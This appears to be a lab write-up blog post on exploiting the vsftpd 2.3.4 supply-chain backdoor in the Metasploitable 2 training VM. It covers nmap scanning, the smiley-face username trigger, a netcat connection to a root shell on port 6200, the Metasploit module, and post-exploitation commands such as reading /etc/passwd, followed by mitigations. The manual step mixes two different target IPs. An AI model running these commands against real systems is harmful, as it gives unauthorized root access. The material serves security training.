Post cover image

May 15, 2026

One Smiley Face, One Root Shell: The vsftpd 2.3.4 Backdoor in Metasploitable 2

Manual exploitation with telnet and netcat, automated with metasploit and why this old backdoor still teaches new lessons today

R

2 min read

Exploiting the vsftpd 2.3.4 Backdoor in Metasploitable 2

##Introduction

Metasploitable 2 is an intentionally vulnerable Linux VM designed by Rapid7 for security training. Among its ~30 open ports sits a particularly nasty vulnerability: vsftpd 2.3.4 running on port 21, which contains a malicious backdoor that was slipped into the source code archive between June 30 and July 1, 2011.

This isn't a configuration error or a coding bug — it's a supply-chain attack that made it into the official tarball. Understanding how it works is essential for every aspiring penetration tester.

##Lab Environment

  1. Kali Linux: Attacker Machine
  2. Metasploitable 2: Target Machine
  3. Vulnerable Service: vsftpd 2.3.4 (Port 21)
  4. Network: Host-Only / NAT

Step 1: Reconnaissance with Nmap

Before touching the exploit, verify the target is alive and identify the vulnerable service:

nmap -sV -p- 192.168.153.130

Key finding: Port 21 is open and running vsftpd 2.3.4 — a known vulnerable version.

None

Step 2: Understanding the Backdoor

The backdoor is elegantly simple: if a username ends with the sequence :), the FTP daemon spawns a root shell bound to port 6200.

Here's how the malicious code works behind the scenes:

// Malicious snippet from vsftpd 2.3.4
if (p_buf[i] == 0x3A && p_buf[i+1] == 0x29) {  // ':' and ')'
    vsf_sysutil_extra();  // Opens backdoor on port 6200
}

The vsf_sysutil_extra() function sets up a TCP listener on port 6200 that drops you straight into a root shell when connected.

Step 3: Manual Exploitation

Sometimes you need to understand the mechanics without relying on automation. Here's the manual approach:

# Connect to FTP and trigger the backdoor
telnet 192.168.153.130
# At the prompt, enter:
USER backdoored:)
PASS anything
# The connection will appear to hang. That's the signal.
# Now connect to the backdoor shell:
nc 192.168.56.101 6200
# Verify root access
whoami
# Output: root
id
# Output: uid=0(root) gid=0(root)

Why this matters: Manual exploitation proves you understand the underlying protocol and vulnerability mechanics — a critical skill that separates script kiddies from competent testers.

Step 4: Automated Exploitation with Metasploit

For efficiency in professional engagements, Metasploit automates this beautifully:

msfconsole
search vsftpd 2.3.4
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.153.130
exploit

Result: Immediate root shell with UID=0(root) GID=0(root)

None None None

Step 5: Post-Exploitation

With root access, enumerate the system:

uname -a
cat /etc/passwd
ifconfig

This demonstrates the full impact: complete system compromise from a single malformed FTP login.

None

##Mitigation & Lessons Learned

  1. Outdated vsftpd: Upgrade to patched versions immediately
  2. Unencrypted FTP: Replace with SFTP or FTPS
  3. No network segmentation: Isolate legacy services
  4. Missing monitoring: Alert on port 6200 connections

This vulnerability exemplifies why supply-chain security and version management are non-negotiable. A single compromised download archive compromised thousands of systems worldwide.

##Conclusion

The vsftpd 2.3.4 backdoor is a perfect storm of simplicity and severity. Whether you trigger it manually with telnet and nc or automate it with Metasploit, the lesson is clear: legacy services with known CVEs are low-hanging fruit for attackers. Practice this in your home lab, understand the mechanics, and carry that knowledge into real-world defense.

⚠️ Disclaimer: This write-up is for educational purposes only. Always obtain proper authorization before penetration testing.